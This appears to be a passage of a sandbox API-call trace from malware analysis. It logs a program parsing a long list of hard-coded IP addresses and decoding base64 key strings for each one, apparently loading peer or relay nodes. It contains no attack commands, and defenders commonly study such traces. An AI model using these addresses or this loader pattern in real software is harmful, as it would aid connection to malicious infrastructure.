returned 0x3d68fb0 [0119.307] inet_addr (cp="36.55.201.103") returned 0x67c93724 [0119.307] CryptStringToBinaryA (in: pszString="AZ/rIs4Ey9BIm38kvgOFGLZPoiM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.307] CryptStringToBinaryA (in: pszString="AZ/rIs4Ey9BIm38kvgOFGLZPoiM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d71958, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d71958, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.307] malloc (_Size=0x74) returned 0x3d68eb0 [0119.307] inet_addr (cp="142.44.243.133") returned 0x85f32c8e [0119.307] CryptStringToBinaryA (in: pszString="Aa4t4xQnbIL8zDYDocLzI45lRMk", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.307] CryptStringToBinaryA (in: pszString="Aa4t4xQnbIL8zDYDocLzI45lRMk", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.307] malloc (_Size=0x74) returned 0x3d68830 [0119.307] inet_addr (cp="149.56.233.142") returned 0x8ee93895 [0119.307] CryptStringToBinaryA (in: pszString="Aa8wHe/NpCJJi9uN5hN4oK/F64Q", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.307] CryptStringToBinaryA (in: pszString="Aa8wHe/NpCJJi9uN5hN4oK/F64Q", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.307] malloc (_Size=0x74) returned 0x3d68a30 [0119.308] inet_addr (cp="58.9.110.19") returned 0x136e093a [0119.308] CryptStringToBinaryA (in: pszString="AbcMfEl/yGZ9teuCxA2PkhTWpIQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.308] CryptStringToBinaryA (in: pszString="AbcMfEl/yGZ9teuCxA2PkhTWpIQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.308] malloc (_Size=0x74) returned 0x3d682b0 [0119.308] inet_addr (cp="51.15.225.216") returned 0xd8e10f33 [0119.308] CryptStringToBinaryA (in: pszString="AcsuKXqPWG27z5jwKKPRpJsKt7o", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.308] CryptStringToBinaryA (in: pszString="AcsuKXqPWG27z5jwKKPRpJsKt7o", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.308] malloc (_Size=0x74) returned 0x3d688b0 [0119.308] inet_addr (cp="103.228.53.155") returned 0x9b35e467 [0119.308] CryptStringToBinaryA (in: pszString="AeGagSrwpMlYSTHNbcPsB87uOiM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.308] CryptStringToBinaryA (in: pszString="AeGagSrwpMlYSTHNbcPsB87uOiM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.308] malloc (_Size=0x74) returned 0x3d68930 [0119.308] inet_addr (cp="185.113.143.86") returned 0x568f71b9 [0119.308] CryptStringToBinaryA (in: pszString="Afc9vZtWwx49Oq65X4zx3rfZpy8", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.308] CryptStringToBinaryA (in: pszString="Afc9vZtWwx49Oq65X4zx3rfZpy8", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.308] malloc (_Size=0x74) returned 0x3d69030 [0119.308] inet_addr (cp="158.69.35.227") returned 0xe323459e [0119.309] CryptStringToBinaryA (in: pszString="AfxxydcD5oJKSo/quEvz7JpUP94", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.309] CryptStringToBinaryA (in: pszString="AfxxydcD5oJKSo/quEvz7JpUP94", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.309] malloc (_Size=0x74) returned 0x3d681b0 [0119.309] inet_addr (cp="123.198.94.17") returned 0x115ec67b [0119.309] CryptStringToBinaryA (in: pszString="Af3I6S0ygIR9hW2h+b/CtM0sLug", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.309] CryptStringToBinaryA (in: pszString="Af3I6S0ygIR9hW2h+b/CtM0sLug", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.309] malloc (_Size=0x74) returned 0x3d684b0 [0119.309] inet_addr (cp="185.220.101.209") returned 0xd165dcb9 [0119.309] CryptStringToBinaryA (in: pszString="Af4hN8QuSAJQeh/ZewFYEW/Xiow", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.309] CryptStringToBinaryA (in: pszString="Af4hN8QuSAJQeh/ZewFYEW/Xiow", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.309] malloc (_Size=0x74) returned 0x3d680b0 [0119.309] inet_addr (cp="85.214.141.131") returned 0x838dd655 [0119.309] CryptStringToBinaryA (in: pszString="Af+chXHRwJ+o0qzOcn1VMP7BADg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.309] CryptStringToBinaryA (in: pszString="Af+chXHRwJ+o0qzOcn1VMP7BADg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.309] malloc (_Size=0x74) returned 0x3d68bb0 [0119.309] inet_addr (cp="31.184.218.180") returned 0xb4dab81f [0119.309] CryptStringToBinaryA (in: pszString="Ah3c1of9UFt+p+ddps7w13iqB/s", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.310] CryptStringToBinaryA (in: pszString="Ah3c1of9UFt+p+ddps7w13iqB/s", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.310] malloc (_Size=0x74) returned 0x3d68130 [0119.310] inet_addr (cp="213.239.215.221") returned 0xddd7efd5 [0119.310] CryptStringToBinaryA (in: pszString="AipVNfQrGp+ap1XE6rXzb++Xgdg", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.310] CryptStringToBinaryA (in: pszString="AipVNfQrGp+ap1XE6rXzb++Xgdg", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.310] malloc (_Size=0x74) returned 0x3d685b0 [0119.310] inet_addr (cp="51.159.57.128") returned 0x80399f33 [0119.310] CryptStringToBinaryA (in: pszString="AjRVWX2raJ7oT7OnvH/F+aPif9Y", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.310] CryptStringToBinaryA (in: pszString="AjRVWX2raJ7oT7OnvH/F+aPif9Y", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.310] malloc (_Size=0x74) returned 0x3d68e30 [0119.310] inet_addr (cp="51.81.254.12") returned 0xcfe5133 [0119.310] CryptStringToBinaryA (in: pszString="Ajlm+9/b5FZRzTNyp8H43MuHGFU", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.310] CryptStringToBinaryA (in: pszString="Ajlm+9/b5FZRzTNyp8H43MuHGFU", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.310] malloc (_Size=0x74) returned 0x3d68230 [0119.310] inet_addr (cp="198.100.148.205") returned 0xcd9464c6 [0119.310] CryptStringToBinaryA (in: pszString="Aj67xXvrf0VHOz3CqoEfs6q6RGY", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.310] CryptStringToBinaryA (in: pszString="Aj67xXvrf0VHOz3CqoEfs6q6RGY", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.310] malloc (_Size=0x74) returned 0x3d68b30 [0119.311] inet_addr (cp="173.75.39.61") returned 0x3d274bad [0119.311] CryptStringToBinaryA (in: pszString="AlH8/bwoFmam1JJ4Wi0on1ZkwDk", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.311] CryptStringToBinaryA (in: pszString="AlH8/bwoFmam1JJ4Wi0on1ZkwDk", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.311] malloc (_Size=0x74) returned 0x3d68430 [0119.311] inet_addr (cp="128.199.229.202") returned 0xcae5c780 [0119.311] CryptStringToBinaryA (in: pszString="AljBQson2uf+nMjs/ImfM1hjWYk", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.311] CryptStringToBinaryA (in: pszString="AljBQson2uf+nMjs/ImfM1hjWYk", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.311] malloc (_Size=0x74) returned 0x3d68ab0 [0119.311] inet_addr (cp="65.49.214.254") returned 0xfed63141 [0119.311] CryptStringToBinaryA (in: pszString="AltmzrwHD8sFGdIGzwz0llwgyW4", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.311] CryptStringToBinaryA (in: pszString="AltmzrwHD8sFGdIGzwz0llwgyW4", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.311] malloc (_Size=0x74) returned 0x3d68f30 [0119.311] inet_addr (cp="185.100.85.61") returned 0x3d5564b9 [0119.311] CryptStringToBinaryA (in: pszString="Am3XhmidJqTBuWq943l88BlB0nY", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.311] CryptStringToBinaryA (in: pszString="Am3XhmidJqTBuWq943l88BlB0nY", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.311] malloc (_Size=0x74) returned 0x3d68c30 [0119.312] inet_addr (cp="199.115.114.70") returned 0x467273c7 [0119.312] CryptStringToBinaryA (in: pszString="AnWM05jj+ELvgkeAeKquAnN3DbI", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.312] CryptStringToBinaryA (in: pszString="AnWM05jj+ELvgkeAeKquAnN3DbI", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.312] malloc (_Size=0x74) returned 0x3d68d30 [0119.312] inet_addr (cp="185.220.101.150") returned 0x9665dcb9 [0119.312] CryptStringToBinaryA (in: pszString="An51yS8SMa5fe9ThU2aW/jBAxGA", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.312] CryptStringToBinaryA (in: pszString="An51yS8SMa5fe9ThU2aW/jBAxGA", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d71e38, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d71e38, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.312] malloc (_Size=0x74) returned 0x3d68cb0 [0119.312] inet_addr (cp="185.220.102.244") returned 0xf466dcb9 [0119.312] CryptStringToBinaryA (in: pszString="An7vCVL3hTM+kKECkmh+baojxzA", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.312] CryptStringToBinaryA (in: pszString="An7vCVL3hTM+kKECkmh+baojxzA", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.312] malloc (_Size=0x74) returned 0x3d68330 [0119.312] inet_addr (cp="213.143.118.181") returned 0xb5768fd5 [0119.312] CryptStringToBinaryA (in: pszString="AomgIYXuFqEuhwFWP3Lq0+4iW5M", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.312] CryptStringToBinaryA (in: pszString="AomgIYXuFqEuhwFWP3Lq0+4iW5M", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.312] malloc (_Size=0x74) returned 0x3d68530 [0119.312] inet_addr (cp="195.189.96.68") returned 0x4460bdc3 [0119.313] CryptStringToBinaryA (in: pszString="ApKIVb+teH+LNj8hhg0efRVuBlU", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.313] CryptStringToBinaryA (in: pszString="ApKIVb+teH+LNj8hhg0efRVuBlU", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.313] malloc (_Size=0x74) returned 0x3d68630 [0119.313] inet_addr (cp="188.165.212.152") returned 0x98d4a5bc [0119.313] CryptStringToBinaryA (in: pszString="Ap4QelnStP69BqYRUWe9bQSNnAo", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.313] CryptStringToBinaryA (in: pszString="Ap4QelnStP69BqYRUWe9bQSNnAo", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.313] malloc (_Size=0x74) returned 0x3d686b0 [0119.313] inet_addr (cp="104.236.52.16") returned 0x1034ec68 [0119.313] CryptStringToBinaryA (in: pszString="Ap9Xw7NQS3l8GJwgisV7XRQfZtM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.313] CryptStringToBinaryA (in: pszString="Ap9Xw7NQS3l8GJwgisV7XRQfZtM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.313] malloc (_Size=0x74) returned 0x3d68730 [0119.313] inet_addr (cp="51.195.150.68") returned 0x4496c333 [0119.313] CryptStringToBinaryA (in: pszString="AqKaL5WCEfm7WCEVMpbv/tkA7MY", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.313] CryptStringToBinaryA (in: pszString="AqKaL5WCEfm7WCEVMpbv/tkA7MY", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d71e98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d71e98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.313] malloc (_Size=0x74) returned 0x3d687b0 [0119.313] inet_addr (cp="2.56.99.215") returned 0xd7633802 [0119.313] CryptStringToBinaryA (in: pszString="AqsJI6/1pH3QEcND95hkxF6f+zQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.313] CryptStringToBinaryA (in: pszString="AqsJI6/1pH3QEcND95hkxF6f+zQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.314] malloc (_Size=0x74) returned 0x3d697b0 [0119.314] inet_addr (cp="209.222.101.251") returned 0xfb65ded1 [0119.314] CryptStringToBinaryA (in: pszString="AsLFNO5bM7eZdQ1l0H65a/MrnFI", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.314] CryptStringToBinaryA (in: pszString="AsLFNO5bM7eZdQ1l0H65a/MrnFI", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.314] malloc (_Size=0x74) returned 0x3d69ab0 [0119.314] inet_addr (cp="134.102.11.42") returned 0x2a0b6686 [0119.314] CryptStringToBinaryA (in: pszString="AtWx9joN04OdnY5wVITsbi9fEIM", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.314] CryptStringToBinaryA (in: pszString="AtWx9joN04OdnY5wVITsbi9fEIM", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.314] malloc (_Size=0x74) returned 0x3d69fb0 [0119.314] inet_addr (cp="126.15.120.233") returned 0xe9780f7e [0119.314] CryptStringToBinaryA (in: pszString="AtejBY9dvAoCqki7HwQSxS34a5I", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.314] CryptStringToBinaryA (in: pszString="AtejBY9dvAoCqki7HwQSxS34a5I", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.314] malloc (_Size=0x74) returned 0x3d6a030 [0119.314] inet_addr (cp="178.18.94.247") returned 0xf75e12b2 [0119.314] CryptStringToBinaryA (in: pszString="Au1PjbEfEwO6IbFqoc8qCkhUeso", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.314] CryptStringToBinaryA (in: pszString="Au1PjbEfEwO6IbFqoc8qCkhUeso", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d71eb8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d71eb8, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.315] malloc (_Size=0x74) returned 0x3d693b0 [0119.315] inet_addr (cp="62.210.217.207") returned 0xcfd9d23e [0119.315] CryptStringToBinaryA (in: pszString="AvJQiY5iE/xrW66jaDIr7gFa1nc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.315] CryptStringToBinaryA (in: pszString="AvJQiY5iE/xrW66jaDIr7gFa1nc", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.315] malloc (_Size=0x74) returned 0x3d690b0 [0119.315] inet_addr (cp="66.108.189.15") returned 0xfbd6c42 [0119.315] CryptStringToBinaryA (in: pszString="AvrsY3Ygtt/zKQIs6qTYO6I87G8", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.315] CryptStringToBinaryA (in: pszString="AvrsY3Ygtt/zKQIs6qTYO6I87G8", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.315] malloc (_Size=0x74) returned 0x3d69eb0 [0119.315] inet_addr (cp="88.209.93.121") returned 0x795dd158 [0119.315] CryptStringToBinaryA (in: pszString="AyW5HTwy06JMhj1d++0AVk+tXGQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.315] CryptStringToBinaryA (in: pszString="AyW5HTwy06JMhj1d++0AVk+tXGQ", cchString=0x1b, dwFlags=0x6, pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d70b98, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0119.315] malloc (_Size=0x74) returned 0x3d69f30 [0119.316] inet_addr (cp="81.17.16.147") returned 0x93101151 [0119.316] CryptStringToBinaryA (in: pszString="Azj59VER/o41cOfeEX7zr5mcwdc", cchString=0x1b, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x339fb30, pdwSkip=0x0, pdwFlags=0x0) returned 1 